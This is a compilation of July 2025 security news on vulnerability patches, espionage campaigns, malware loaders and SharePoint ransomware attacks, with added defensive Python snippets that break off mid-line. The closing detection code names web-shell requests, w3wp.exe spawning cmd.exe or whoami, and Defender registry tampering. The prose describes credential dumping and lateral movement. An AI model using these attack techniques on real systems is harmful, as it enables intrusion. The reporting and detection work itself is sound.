2025-07-25 AI Startup News

Critical Mitel Flaw Lets Hackers Bypass Login, Gain Full Access to MiVoice MX-ONE Systems

Mitel has released security updates to address a critical security flaw in MiVoice MX-ONE that could allow an attacker to bypass authentication protections. “An authentication bypass vulnerability has been identified in the Provisioning Manager component of Mitel MiVoice MX-ONE, which, if successfully exploited, could allow an unauthenticated attacker to conduct an authentication bypass attack due to improper access control,” the company said in an advisory released Wednesday. “A successful exploit of this vulnerability could allow an attacker to gain unauthorized access to user or admin accounts in the system.” The shortcoming, which is yet to be assigned a CVE identifier, carries a CVSS score of 9.4 out of a maximum of 10.0. It affects MiVoice MX-ONE versions from 7.3 (7.3.0.0.50) to 7.8 SP1 (7.8.1.0.14).

Patches for the issue have been made available in MXO-15711_78SP0 and MXO-15711_78SP1 for MX-ONE versions 7.8 and 7.8 SP1, respectively. Customers using MiVoice MX-ONE version 7.3 and above are recommended to submit a patch request to their authorized service partner. As mitigations until fixes can be applied, it’s advised to limit direct exposure of MX-ONE services to the public internet and ensure that they are placed within a trusted network. Along with the authentication bypass flaw, Mitel has shipped updates to resolve a high-severity vulnerability in MiCollab (CVE-2025-52914, CVSS score: 8.8) that, if successfully exploited, could permit an authenticated attacker to carry out an SQL injection attack.

“A successful exploit could allow an attacker to access user provisioning information and execute arbitrary SQL database commands with potential impacts on the confidentiality, integrity, and availability of the system,” Mitel said. The vulnerability, which impacts MiCollab versions 10.0 (10.0.0.26) to 10.0 SP1 FP1 (10.0.1.101) and 9.8 SP3 (9.8.3.1) and earlier, has been resolved in versions 10.1 (10.1.0.10), 9.8 SP3 FP1 (9.8.3.103), and later. With shortcomings in Mitel devices coming under active attacks in the past, it’s essential that users move quickly to update their installations as soon as possible to mitigate potential threats. Found this article interesting?

Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.

Fire Ant Exploits VMware Flaws to Compromise ESXi Hosts and vCenter Environments

Virtualization and networking infrastructure have been targeted by a threat actor codenamed Fire Ant as part of a prolonged cyber espionage campaign. The activity, observed this year, is primarily designed to infiltrate organizations’ VMware ESXi and vCenter environments as well as network appliances, Sygnia said in a new report published today. “The threat actor leveraged combinations of sophisticated and stealthy techniques creating multilayered attack kill chains to facilitate access to restricted and segmented network assets within presumed to be isolated environments,” the cybersecurity company said. “The attacker demonstrated a high degree of persistence and operational maneuverability, operating through eradication efforts, adapting in real time to eradication and containment actions to maintain access to the compromised infrastructure.” Fire Ant is assessed to share tooling and targeting overlaps with prior campaigns orchestrated by UNC3886, a China-nexus cyber espionage group known for its persistent targeting of edge devices and virtualization technologies since at least 2022.

Attacks mounted by the threat actor have been found to establish entrenched control of VMware ESXi hosts and vCenter servers, demonstrating advanced capabilities to pivot into guest environments and bypass network segmentation by compromising network appliances. Another noteworthy aspect is the ability of the threat actor to maintain operational resilience by adapting to containment efforts, switching to different tools, dropping fallback backdoors for persistence, and altering network configurations to re-establish access to compromised networks. Fire Ant’s breach of the virtualization management layer is achieved by the exploitation of CVE-2023-34048, a known security flaw in VMware vCenter Server that has been exploited by UNC3886 as a zero-day for years prior to it being patched by Broadcom in October 2023. “From vCenter, they extracted the ‘vpxuser’ service account credentials and used them to access connected ESXi hosts,” Sygnia noted.

“They deployed multiple persistent backdoors on both ESXi hosts and the vCenter to maintain access across reboots. The backdoor filename, hash and deployment technique aligned with the VIRTUALPITA malware family.” Also dropped is a Python-based implant (“autobackup.bin”) that provides remote command execution, and file download and upload capabilities. It runs in the background as a daemon. Upon gaining unauthorized access to the hypervisor, the attackers are said to have leveraged another flaw in VMware Tools (CVE-2023-20867) to interact directly with guest virtual machines via PowerCLI, as well as to have interfered with the functioning of security tools and extracted credentials from memory snapshots, including those of domain controllers.

Some of the other crucial aspects of the threat actor’s tradecraft are as follows:
- Dropping the V2Ray framework to facilitate guest network tunneling
- Deploying unregistered virtual machines directly on multiple ESXi hosts
- Breaking down network segmentation barriers and establishing cross-segment persistence
- Resisting incident response and remediation efforts by re-compromising assets and, in some cases, blending in by renaming their payloads to impersonate forensic tools

The attack chain ultimately opened up a pathway for Fire Ant to maintain persistent, covert access from the hypervisor to guest operating systems. Sygnia also described the adversary as possessing a “deep understanding” of the target environment’s network architecture and policies in order to reach otherwise isolated assets. Fire Ant is unusually focused on remaining undetected and leaves a minimal intrusion footprint. This is evidenced in the steps taken by the attackers to tamper with logging on ESXi hosts by terminating the “vmsyslogd” process, effectively suppressing an audit trail and limiting forensic visibility.
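Killing vmsyslogd suppresses the audit trail on the host itself, but a central collector can still notice the tampering by absence: once the daemon is gone, that host’s forwarded syslog stream stops. The following is an added example, not Sygnia’s code or tooling, of a silence check run over a constructed batch of forwarded ESXi syslog lines; the hostnames, timestamps, message bodies, the host inventory and the 30-minute threshold are all assumptions.

```python
"""Silence check for ESXi remote syslog feeds (added example, not Sygnia tooling).

If vmsyslogd is killed on a host, that host's forwarded lines stop reaching the
collector. Comparing the newest line seen per host with the host inventory and a
maximum tolerated gap turns that absence into a finding.
"""
from datetime import datetime, timedelta, timezone

# Constructed sample of forwarded lines in "<pri>timestamp host tag: message"
# shape; hostnames, times and message bodies are hypothetical.
SAMPLE_LINES = [
    "<166>2025-07-24T09:40:11Z esxi-01 Hostd: [Originator@6876 sub=Vimsvc] Accepted password for user root",
    "<166>2025-07-24T09:58:10Z esxi-01 Hostd: [Originator@6876 sub=Hostsvc] Event 1201",
    "<166>2025-07-24T07:12:44Z esxi-02 Hostd: [Originator@6876 sub=Vimsvc] Accepted password for user root",
    "<166>2025-07-24T09:59:02Z esxi-03 vmkernel: cpu3:2098011)NetPort: enabled port 0x2000004",
    "this line is deliberately malformed and must be skipped",
]

# Hosts that are expected to report; esxi-04 never sent anything at all.
INVENTORY = ["esxi-01", "esxi-02", "esxi-03", "esxi-04"]

TS_FORMAT = "%Y-%m-%dT%H:%M:%SZ"


def parse_ts(text):
    """Parse a UTC timestamp in the sample's ISO-8601 'Z' form."""
    return datetime.strptime(text, TS_FORMAT).replace(tzinfo=timezone.utc)


def parse_line(line):
    """Return (timestamp, host) for one forwarded line, or None if it is malformed."""
    try:
        body = line.split(">", 1)[1]              # drop the <pri> field
        ts_text, host, _rest = body.split(" ", 2)
        return parse_ts(ts_text), host
    except (IndexError, ValueError):
        return None


def last_seen(lines):
    """Map each host to the newest timestamp observed for it in the feed."""
    seen = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, host = parsed
        if host not in seen or ts > seen[host]:
            seen[host] = ts
    return seen


def silent_hosts(lines, inventory, now_text, max_gap_minutes=30):
    """Return {host: minutes_silent} for inventory hosts quiet longer than the gap.

    A host with no lines at all is reported with the value None, because "never
    reported" and "stopped reporting" are different findings to chase.
    """
    now = parse_ts(now_text)
    max_gap = timedelta(minutes=max_gap_minutes)
    seen = last_seen(lines)
    findings = {}
    for host in inventory:
        if host not in seen:
            findings[host] = None
            continue
        gap = now - seen[host]
        if gap > max_gap:
            findings[host] = int(gap.total_seconds() // 60)
    return findings


if __name__ == "__main__":
    for host, gap in silent_hosts(SAMPLE_LINES, INVENTORY, "2025-07-24T10:00:00Z").items():
        print(f"{host}: {'no lines received' if gap is None else f'silent for {gap} min'}")
```

The check is deliberately independent of message content: it does not need to recognise a specific "daemon stopped" event, which is exactly what an attacker who terminates the logger denies you. A host that goes quiet while vCenter still reports it as powered on is the case worth a ticket; the inventory comparison also catches hosts that were never onboarded to remote logging in the first place.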

The findings underscore a worrying trend involving the persistent and successful targeting of network edge devices by threat actors, particularly those from China, in recent years. “This campaign underscores the importance of visibility and detection within the hypervisor and infrastructure layer, where traditional endpoint security tools are ineffective,” Sygnia said. “Fire Ant consistently targeted infrastructure systems such as ESXi hosts, vCenter servers, and F5 load balancers. The targeted systems are rarely integrated into standard detection and response programs.

These assets lack detection and response solutions and generate limited telemetry, making them ideal long-term footholds for stealthy operation.”

CastleLoader Malware Infects 469 Devices Using Fake GitHub Repos and ClickFix Phishing

Cybersecurity researchers have shed light on a new versatile malware loader called CastleLoader that has been put to use in campaigns distributing various information stealers and remote access trojans (RATs). The activity employs Cloudflare-themed ClickFix phishing attacks and fake GitHub repositories opened under the names of legitimate applications, Swiss cybersecurity company PRODAFT said in a report shared with The Hacker News. The malware loader, first observed in the wild earlier this year, has been used to distribute DeerStealer, RedLine, StealC, NetSupport RAT, SectopRAT, and even other loaders like Hijack Loader. “It employs dead code injection and packing techniques to hinder analysis,” the company said.

“After unpacking itself at runtime, it connects to a C2 (command-and-control) server, downloads target modules, and executes them.” CastleLoader’s modular structure allows it to act as both a delivery mechanism and a staging utility, enabling threat actors to separate initial infection from payload deployment. This separation complicates attribution and response because it decouples the infection vector from the eventual malware behavior, giving attackers more flexibility in adapting campaigns over time. CastleLoader payloads are distributed as portable executables containing an embedded shellcode, which then invokes the main module of the loader that, in turn, connects to the C2 server in order to fetch and execute the next-stage malware. Attacks distributing the malware have relied on the prevalent ClickFix technique on domains posing as software development libraries, videoconferencing platforms, browser update notifications, or document verification systems, ultimately tricking users into copying and executing PowerShell commands that activate the infection chain.

Victims are directed to the bogus domains through Google searches, at which point they are served pages containing fake error messages and CAPTCHA verification boxes developed by the threat actors, asking them to carry out a series of instructions to supposedly address the issue. Alternatively, CastleLoader leverages fake GitHub repositories mimicking legitimate tools as a distribution vector, causing users who unknowingly download them to compromise their machines with malware instead. “This technique exploits developers’ trust in GitHub and their tendency to run installation commands from repositories that appear reputable,” PRODAFT said. This strategic abuse of social engineering mirrors techniques used by initial access brokers (IABs), underscoring its role within a broader cybercrime supply chain.

PRODAFT said it has observed Hijack Loader being delivered via DeerStealer as well as CastleLoader, with the latter also propagating DeerStealer variants. This suggests the overlapping nature of these campaigns, despite them being orchestrated by different threat actors. Since May 2025, CastleLoader campaigns have leveraged seven distinct C2 servers, with over 1,634 infection attempts recorded during the time period. Analysis of its C2 infrastructure and its web-based panel, which is used to oversee and manage the infections, shows that as many as 469 devices were compromised, resulting in an infection rate of 28.7%.

Researchers also observed elements of anti-sandboxing and obfuscation, features typical in advanced loaders like SmokeLoader or IcedID. Combined with PowerShell abuse, GitHub impersonation, and dynamic unpacking, CastleLoader reflects a growing trend in stealth-first malware loaders that operate as stagers in malware-as-a-service (MaaS) ecosystems. “Castle Loader is a new and active threat, rapidly adopted by various malicious campaigns to deploy an array of other loaders and stealers,” PRODAFT said. “Its sophisticated anti-analysis techniques and multi-stage infection process highlight its effectiveness as a primary distribution mechanism in the current threat landscape.” “The C2 panel demonstrates operational capabilities typically associated with malware-as-a-service (MaaS) offerings, suggesting the operators have experience in cybercriminal infrastructure development.”



Sophos and SonicWall Patch Critical RCE Flaws Affecting Firewalls and SMA 100 Devices

Sophos and SonicWall have alerted users of critical security flaws in Sophos Firewall and Secure Mobile Access (SMA) 100 Series appliances that could be exploited to achieve remote code execution. The two vulnerabilities impacting Sophos Firewall are listed below:
- CVE-2025-6704 (CVSS score: 9.8) - An arbitrary file writing vulnerability in the Secure PDF eXchange (SPX) feature can lead to pre-auth remote code execution, if a specific configuration of SPX is enabled in combination with the firewall running in High Availability (HA) mode
- CVE-2025-7624 (CVSS score: 9.8) - An SQL injection vulnerability in the legacy (transparent) SMTP proxy can lead to remote code execution, if a quarantining policy is active for Email and SFOS was upgraded from a version older than 21.0 GA

Sophos said CVE-2025-6704 affects about 0.05% of devices, while CVE-2025-7624 impacts as many as 0.73% of devices. Both vulnerabilities have been addressed alongside a high-severity command injection vulnerability in the WebAdmin component (CVE-2025-7382, CVSS score: 8.8) that could result in pre-auth code execution on High Availability (HA) auxiliary devices, if OTP authentication for the admin user is enabled. Also patched by the company are two other vulnerabilities:
- CVE-2024-13974 (CVSS score: 8.1) - A business logic vulnerability in the Up2Date component can lead to attackers controlling the firewall’s DNS environment to achieve remote code execution
- CVE-2024-13973 (CVSS score: 6.8) - A post-auth SQL injection vulnerability in WebAdmin can potentially lead to administrators achieving arbitrary code execution

The U.K. National Cyber Security Centre (NCSC) has been credited with discovering and reporting both CVE-2024-13974 and CVE-2024-13973. The issues affect the following versions:
- CVE-2024-13974 - Affects Sophos Firewall v21.0 GA (21.0.0) and older
- CVE-2024-13973 - Affects Sophos Firewall v21.0 GA (21.0.0) and older
- CVE-2025-6704 - Affects Sophos Firewall v21.5 GA (21.5.0) and older
- CVE-2025-7624 - Affects Sophos Firewall v21.5 GA (21.5.0) and older
- CVE-2025-7382 - Affects Sophos Firewall v21.5 GA (21.5.0) and older

The disclosure comes as SonicWall detailed a critical bug in the SMA 100 Series web management interface (CVE-2025-40599, CVSS score: 9.1) that a remote attacker with administrative privileges can exploit to upload arbitrary files and potentially achieve remote code execution. The flaw impacts SMA 100 Series products (SMA 210, 410, 500v) and has been addressed in version 10.2.2.1-90sv. SonicWall also pointed out that while the vulnerability has not been exploited, there exists a potential risk in light of a recent report from the Google Threat Intelligence Group (GTIG), which found evidence of a threat actor dubbed UNC6148 leveraging fully-patched SMA 100 series devices to deploy a backdoor called OVERSTEP.

Besides applying the fixes, the company is also recommending that customers of SMA 100 Series devices carry out the following steps:
- Disable remote management access on the external-facing interface (X1) to reduce the attack surface
- Reset all passwords and reinitialize OTP (One-Time Password) binding for users and administrators on the appliance
- Enforce multi-factor authentication (MFA) for all users
- Enable Web Application Firewall (WAF) on SMA 100

Organizations using SMA 100 Series devices are also advised to review appliance logs and connection history for anomalies and check for any signs of unauthorized access. Organizations using the SMA 500v virtual product are required to back up the OVA file, export the configuration, remove the existing virtual machine and all associated virtual disks and snapshots, reinstall the new OVA from SonicWall using a hypervisor, and restore the configuration.

Watch This Webinar to Uncover Hidden Flaws in Login, AI, and Digital Trust — and Fix Them

Is Managing Customer Logins and Data Giving You Headaches? You’re Not Alone! Today, we all expect super-fast, secure, and personalized online experiences. But let’s be honest, we’re also more careful about how our data is used.

If something feels off, trust can vanish in an instant. Add to that the lightning-fast changes AI is bringing to everything from how we log in to spotting online fraud, and it’s a whole new ball game! If you’re dealing with logins, data privacy, bringing new users on board, or building digital trust, this webinar is for you. Join us for “Navigating Customer Identity in the AI Era,” where we’ll dive into the Auth0 2025 Customer Identity Trends Report.

We’ll show you what’s working, what’s not, and how to tweak your strategy for the year ahead. In just one session, you’ll get practical answers to real-world challenges like: How AI is changing what users expect – and where they’re starting to push back. The new identity threats on the rise – and how to stop them early. Making logins smoother and easier – without sacrificing security.

Where AI can help you big time – and where you still need that human touch. What top digital companies are doing differently to stay ahead. This session is perfect for anyone focused on making customer experiences better, boosting security, or driving digital innovation. Whether you’re an IT or security leader, a product team member, or part of marketing and customer experience, you’ll find valuable takeaways.

Even if you’re leading digital transformation, this webinar offers key guidance to align AI with what customers truly want. “Navigating Customer Identity in the AI Era” is your chance to get ahead with insights from the Auth0 2025 CIAM Trends Report. The webinar is on July 28, 2025, and features an expert from Auth0 by Okta, a trusted name in secure identity solutions. Registration is free, but spots are limited!

Don’t miss out on future-proofing your identity strategy, staying compliant, and building massive digital trust. As AI keeps evolving, your customer identity strategy needs to evolve with it. This webinar gives you the data, the trends, and the expert insights to make smarter decisions – starting now. Don’t get left behind.

Join us and become a leader in customer trust! This article is a contributed piece from one of our valued partners.

Pentests once a year? Nope. It’s time to build an offensive SOC

You wouldn’t run your blue team once a year, so why accept this substandard schedule for your offensive side? Your cybersecurity teams are under intense pressure to be proactive and to find your network’s weaknesses before adversaries do. But in many organizations, offensive security is still treated as a one-time event: an annual pentest, a quarterly red team engagement, maybe an audit sprint before a compliance deadline. That’s not defense.

It’s theater. In the real world, adversaries don’t operate in bursts. Their recon is continuous, their tools and tactics are always evolving, and new vulnerabilities are often reverse-engineered into working exploits within hours of a patch release. So, if your offensive validation isn’t just as dynamic, you’re not just lagging, you’re exposed.

It’s time to move beyond the once-a-year pentest. It’s time to build an Offensive Security Operations Center.

Why annual pentesting falls short

Point-in-time penetration tests still serve a role, and will remain a compliance requirement. But they fall short in environments that change faster than they can be assessed.

This is true for a number of reasons:

- The scope is limited. Most enterprise pentests are scoped to avoid business disruption, but we all know that attackers don’t care about your scope or, unless they’re in stealth mode, about disrupting your business.
- Controls decay silently. Drift is constant. An EDR policy gets loosened. A SIEM rule breaks. And annual pentests are not built to catch these problems. The security control that “passed” in the test may very well fail when it really matters, two weeks later.
- Access escalates quietly. In Active Directory environments, misconfigurations accumulate silently over time: nested groups, stale accounts, over-privileged service identities, and well-known privilege escalation paths are commonplace. These aren’t just theoretical risks; they’ve been actively leveraged for decades. Attackers don’t need zero-days to succeed. They rely on weak trust relationships, configuration drift, and a lack of visibility.
- Timing lags. By the time a pentest report is delivered, your environment has already changed. You’re chasing what was, not what is. It’s like looking at last month’s video from your door camera to see what’s happening today.

However, this is not a call to abolish pentesting. Quite the opposite: manual pentests bring human creativity, contextual awareness, and adversarial thinking that no automation can replicate. But relying on them alone, especially when performed only once or twice a year, limits their impact.

By building an Offensive SOC and operationalizing continuous validation, organizations enable pentesters to focus on what they do best: uncover edge cases, bypass defenses creatively, and explore complex scenarios beyond the reach of automation. In short: an Offensive SOC doesn’t replace pentesting, it gives it room to evolve. Without continuous validation, a security posture becomes a snapshot, not a source of truth.

From point-in-time defense to persistent offense

The Offensive Security Operations Center (Offensive SOC) flips the model from a one-off pentest as part of a decidedly defensive SOC to a team continuously out-maneuvering adversaries by thinking and acting like an attacker, every single day.

Instead of waiting for trouble to respond to, the Offensive SOC is collaborative, transparent, and built to uncover tangible risks and drive actual fixes, in real time. Think of it this way: if a traditional SOC raises alerts on attacks that reach you, the Offensive SOC raises alerts on vulnerabilities that could. And the tools that power it? It’s time to toss your outdated clipboards and checklists and power up Breach and Attack Simulation (BAS) and Automated Penetration Testing solutions.

The core pillars of the offensive SOC

  1. Continuously discovering what’s exposed

You can’t validate what you haven’t found. Your organization’s attack surface is sprawling, with cloud workloads, unmanaged assets, shadow IT, stale DNS records, and public S3 buckets. It’s time to accept that periodic scans just don’t cut it anymore.

Discovery must be persistent and continuous, just as an attacker’s would be.

  2. Real-world attack simulation with BAS

Breach and Attack Simulation (BAS) doesn’t guess. It simulates real-world TTPs mapped to industry-recognized frameworks like MITRE ATT&CK® across the kill chain.

BAS answers a series of practical yet high-stakes questions: Can your SIEM catch a credential dumping attack? Will your EDR block known ransomware? Does your WAF stop critical web attacks like Citrix Bleed or IngressNightmare? BAS is about controlled, safe, production-aware testing: executing the same techniques attackers use against your actual controls, without actually putting your data, bottom line, and reputation at risk.

BAS will show you exactly what works, what fails, and where to best focus your efforts.

  3. Exploit Chain Testing with Automated Pentesting

Individual vulnerabilities may not be harmful on their own. However, adversaries carefully chain multiple vulnerabilities and misconfigurations together to achieve their objectives.

With Automated Penetration Testing, security teams can validate how a real compromise could unfold, step by step, end to end. Automated Pentesting simulates an assumed breach from a domain-joined system, starting with access to a low-privileged or system-level user. From this foothold, it discovers and validates the shortest, stealthiest attack paths to critical assets, such as domain admin privileges, by chaining real techniques like credential theft, lateral movement, and privilege escalation. Here’s an example: Initial access to an HR workstation exposes a Kerberoasting opportunity, triggered by misconfigured service account permissions.

Offline password cracking reveals plaintext credentials. Those credentials enable lateral movement to another machine. Eventually, the simulation captures a domain admin’s NTLM hash, with no alerts triggered and no controls intervening. This is just one scenario among thousands, but it mirrors the real tactics adversaries use to escalate their privileges inside your network.

  4. Drift Detection and Posture Tracking

Security isn’t static. Rules change. Configurations shift. Controls fail quietly. The Offensive SOC keeps score over time. It tracks when your prevention and detection layer solutions start to slip, like:
- An EDR policy update that disables known malware signatures
- A SIEM alert that quietly stops firing after a rule modification
- A firewall rule that’s altered during maintenance, leaving a port exposed

The Offensive SOC doesn’t just tell you what failed, it tells you when it started failing. And this is how you stay ahead: not by reacting to alerts, but by catching your vulnerabilities before they’re exploited.
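All three examples are regressions: a control that used to pass stopped passing at some point, and the useful finding is the point, not just the fact. The following is an added example, not Picus code and not its platform’s output, of turning a history of validation runs into exactly that “started failing on” finding. The run history, the technique labels and the dates are constructed; a technique that was not exercised in a given run is skipped rather than treated as a pass or a fail.

```python
"""Posture drift tracking over repeated validation runs (added example, not Picus code).

Each run records pass/fail per simulated technique. For every technique that
currently fails, the report gives the run at which the failing streak began and
the last run in which it passed, so the finding reads "started failing on ..."
rather than only "fails".
"""

# Constructed run history, oldest first; technique names are hypothetical labels
# for the kinds of checks the text describes (EDR, SIEM, firewall).
RUNS = [
    {"ts": "2025-07-01", "results": {
        "lsass-dump-detected": "pass",        # SIEM rule
        "ransomware-sample-blocked": "pass",  # EDR policy
        "smb-445-inbound-blocked": "pass",    # firewall rule
        "webshell-upload-blocked": "fail",    # has never passed
        "dns-exfil-alert": "pass",
        "credential-phish-blocked": "fail",
    }},
    {"ts": "2025-07-08", "results": {
        "lsass-dump-detected": "pass",
        "ransomware-sample-blocked": "fail",  # signatures disabled by a policy update
        "smb-445-inbound-blocked": "pass",
        "webshell-upload-blocked": "fail",
        "dns-exfil-alert": "fail",
        "credential-phish-blocked": "pass",   # fixed after the first run
    }},
    {"ts": "2025-07-15", "results": {
        "lsass-dump-detected": "fail",        # rule modified, alert stopped firing
        "ransomware-sample-blocked": "fail",
        "smb-445-inbound-blocked": "pass",
        "webshell-upload-blocked": "fail",
        "dns-exfil-alert": "pass",
        "credential-phish-blocked": "pass",
    }},
    {"ts": "2025-07-22", "results": {
        "lsass-dump-detected": "fail",
        "ransomware-sample-blocked": "fail",
        "smb-445-inbound-blocked": "fail",    # port left exposed during maintenance
        "webshell-upload-blocked": "fail",
        "dns-exfil-alert": "fail",            # flapping control, failing again
        "credential-phish-blocked": "pass",
    }},
]


def failure_streak(runs, technique):
    """Return (since_ts, last_pass_ts) for the current unbroken failing streak.

    Returns None when the newest result is not a fail. last_pass_ts is None when
    the technique has failed in every run that exercised it.
    """
    if runs[-1]["results"].get(technique) != "fail":
        return None
    since = runs[-1]["ts"]
    last_pass = None
    for run in reversed(runs[:-1]):
        result = run["results"].get(technique)
        if result is None:
            continue                      # not exercised in that run: no evidence
        if result == "fail":
            since = run["ts"]
        else:
            last_pass = run["ts"]
            break
    return since, last_pass


def drift_report(runs):
    """Map every currently failing technique to when its failure began."""
    techniques = sorted({t for run in runs for t in run["results"]})
    report = {}
    for technique in techniques:
        streak = failure_streak(runs, technique)
        if streak is None:
            continue
        since, last_pass = streak
        if last_pass is None:
            report[technique] = {"status": "never_passed", "since": since}
        else:
            report[technique] = {"status": "regressed", "since": since, "last_pass": last_pass}
    return report


def new_regressions(runs):
    """Techniques whose failing streak started in the newest run: today's drift."""
    newest = runs[-1]["ts"]
    return [t for t, r in drift_report(runs).items()
            if r["status"] == "regressed" and r["since"] == newest]


if __name__ == "__main__":
    for technique, finding in drift_report(RUNS).items():
        print(f"{technique}: {finding}")
    print("new this run:", new_regressions(RUNS))
```

Separating "regressed" from "never passed" matters for triage: a regression points at a change to go and find (a policy push, a rule edit, a maintenance window), while a control that has never passed is a gap to be built, not a drift to be reverted. The "new this run" list is what a daily Offensive SOC ticket queue would be fed from.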

Where Picus fits in

Picus helps security teams operationalize the Offensive SOC, with a unified platform that continuously validates exposures across prevention, detection, and response layers. We combine:
- BAS to test how your controls respond to real-world threats.
- Automated penetration testing to simulate attacker movement post-access and identify high-risk paths.
- Known threat and mitigation libraries to simulate attacks and close gaps faster.
- Seamless integration with your existing SOC stack.

And Picus isn’t just making promises. The Blue Report 2024 found that:
- Organizations using Picus reduced critical vulnerabilities by over 50%.
- Customers doubled their prevention effectiveness in 90 days.
- Teams mitigated security gaps 81% faster using Picus.

With Picus, you can boldly move beyond assumptions and make decisions backed by validation. That’s the value of an Offensive SOC: focused, efficient, and continuous security improvement.

Final thought: Validation isn’t a report, it’s a practice

Building an Offensive SOC isn’t about adding more dashboards, solutions, or noise; it’s about turning your reactive security operations center into a continuous validation engine.

It means proving what’s exploitable, what’s protected, and what needs attention. Picus helps your security teams do exactly that, operationalizing validation across your entire stack. Ready to explore the details? Download The CISO’s Guide for Security and Exposure Validation to:
- Understand the complementary roles of Breach and Attack Simulation and Automated Penetration Testing
- Learn how to prioritize risk based on exploitability, not just severity
- See how to embed Adversarial Exposure Validation into your CTEM strategy for continuous, measurable improvement

Get the Exposure Validation Guide and make validation part of your everyday SOC operations, not just something you check off a list once a year.

This article is a contributed piece from one of our valued partners.

China-Based APTs Deploy Fake Dalai Lama Apps to Spy on Tibetan Community

The Tibetan community has been targeted by a China-nexus cyber espionage group as part of two campaigns conducted last month ahead of the Dalai Lama’s 90th birthday on July 6, 2025. The multi-stage attacks have been codenamed Operation GhostChat and Operation PhantomPrayers by Zscaler ThreatLabz. “The attackers compromised a legitimate website, redirecting users via a malicious link and ultimately installing either the Gh0st RAT or PhantomNet (aka SManager) backdoor onto victim systems,” security researchers Sudeep Singh and Roy Tay said in a Wednesday report. This is not the first time Chinese threat actors have resorted to watering hole attacks (aka strategic web compromises), a technique where adversaries break into websites frequently visited by a specific group to infect their devices with malware.

Over the past two years, hacking groups like EvilBamboo, Evasive Panda, and TAG-112 have all resorted to the approach to target the Tibetan diaspora with the ultimate goal of gathering sensitive information.

Operation GhostChat

The latest set of attacks observed by Zscaler entails the compromise of a web page to replace the link pointing to “tibetfund[.]org/90thbirthday” with a fraudulent version (“thedalailama90.niccenter[.]net”). While the original web page is designed to send a message to the Dalai Lama, the replica page adds an option to send an encrypted message to the spiritual leader by downloading from “tbelement.niccenter[.]net” a secure chat application named TElement, which claims to be a Tibetan version of Element. Hosted on the website is a backdoored version of the open-source encrypted chat software containing a malicious DLL that’s sideloaded to launch Gh0st RAT, a remote access trojan widely used by various Chinese hacking groups.

The web page also includes JavaScript code designed to collect the visitor’s IP address and user-agent information, and exfiltrate the details to the threat actor via an HTTP POST request. Gh0st RAT is a fully-featured malware that supports file manipulation, screen capture, clipboard content extraction, webcam video recording, keylogging, audio recording and playback, process manipulation, and remote shell.

Operation PhantomPrayers

The second campaign, Operation PhantomPrayers, has been found to leverage another domain, “hhthedalailama90.niccenter[.]net,” to distribute a phony “90th Birthday Global Check-in” app (“DalaiLamaCheckin.exe,” dubbed PhantomPrayers) that, when opened, displays an interactive map and urges victims to “send your blessings” for the Dalai Lama by tapping their location on the map. However, the malicious functionality is stealthily triggered in the background, using DLL side-loading techniques to launch PhantomNet, a backdoor that establishes contact with a command-and-control (C2) server over TCP to receive additional plugin DLLs for execution on the compromised machine.

“PhantomNet can be set to operate only during specific hours or days, but this capability is not enabled in the current sample,” the researchers said. “PhantomNet used modular plugin DLLs, AES-encrypted C2 traffic, and configurable timed operations, to stealthily manage compromised systems.”

Storm-2603 Exploits SharePoint Flaws to Deploy Warlock Ransomware on Unpatched Systems

Microsoft has revealed that one of the threat actors behind the active exploitation of SharePoint flaws is deploying Warlock ransomware on targeted systems. The tech giant, in an update shared Wednesday, said the findings are based on an “expanded analysis and threat intelligence from our continued monitoring of exploitation activity by Storm-2603.” The threat actor attributed to the financially motivated activity is a suspected China-based threat actor that’s known to drop Warlock and LockBit ransomware in the past. The attack chains entail the exploitation of CVE-2025-49706, a spoofing vulnerability, and CVE-2025-49704, a remote code execution vulnerability, targeting unpatched on-premises SharePoint servers to deploy the spinstall0.aspx web shell payload. “This initial access is used to conduct command execution using the w3wp.exe process that supports SharePoint,” Microsoft said.

“Storm-2603 then initiates a series of discovery commands, including whoami, to enumerate user context and validate privilege levels.” The attacks are characterized by the use of cmd.exe and batch scripts as the threat actor burrows deeper into the target network, while services.exe is abused to turn off Microsoft Defender protections by modifying the Windows Registry. In addition to leveraging spinstall0.aspx for persistence, Storm-2603 has been observed creating scheduled tasks and modifying Internet Information Services (IIS) components to launch what Microsoft described as suspicious .NET assemblies. These actions are designed to ensure ongoing access even if the victims take steps to plug the initial access vectors. Some of the other noteworthy aspects of the attacks include the deployment of Mimikatz to harvest credentials by targeting the Local Security Authority Subsystem Service ( LSASS ) memory, and then proceeding to conduct lateral movement using PsExec and the Impacket toolkit.

“Storm-2603 is then observed modifying Group Policy Objects (GPO) to distribute Warlock ransomware in compromised environments,” Microsoft said. As mitigations, users are urged to follow the steps below:

- Upgrade to supported versions of on-premises Microsoft SharePoint Server
- Apply the latest security updates
- Ensure the Antimalware Scan Interface (AMSI) is turned on and configured correctly
- Deploy Microsoft Defender for Endpoint, or equivalent solutions
- Rotate SharePoint Server ASP.NET machine keys
- Restart IIS on all SharePoint servers using iisreset.exe (if AMSI cannot be enabled, it's advised to rotate the keys and restart IIS after installing the new security update)
- Implement an incident response plan

The development comes as the SharePoint Server flaws have come under large-scale exploitation, already claiming at least 400 victims. Linen Typhoon (aka APT27) and Violet Typhoon (aka APT31) are two other Chinese hacking groups that have been linked to the malicious activity. China has denied the allegations.
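The chain Microsoft describes (web shell request, w3wp.exe spawning a shell, Defender switched off through the registry) is easy to express as detection logic. The following is an added example, not Microsoft's code or detection rules: it scores constructed IIS W3C log lines and process-creation events against those three behaviours. The event schema, the host names and IPs, and the use of reg.exe as the vehicle for the registry change are assumptions made for the illustration; only the spinstall0.aspx file name, w3wp.exe, whoami and the Defender tampering come from the text.

```python
"""Detection heuristics for the Storm-2603 SharePoint intrusion chain.

Added example, not Microsoft's detection logic. It scores constructed
(made-up) IIS W3C log lines and process-creation events against the
behaviours described above: requests for the spinstall0.aspx web shell,
w3wp.exe spawning cmd.exe/whoami, and Defender tampering through the
registry. The event schema and sample hosts/IPs are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record as a SIEM might normalise it (hypothetical schema)."""
    host: str
    parent: str   # parent image name, e.g. w3wp.exe
    image: str    # child image name
    cmdline: str


WEBSHELL_RE = re.compile(r"spinstall0\.aspx", re.I)
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "whoami.exe"}
# Policy values an attacker sets to switch Defender off; reg.exe as the vehicle is illustrative.
DEFENDER_TAMPER_RE = re.compile(
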